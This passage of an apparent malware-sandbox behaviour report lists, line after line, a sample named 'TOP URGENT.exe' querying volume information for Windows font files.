                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
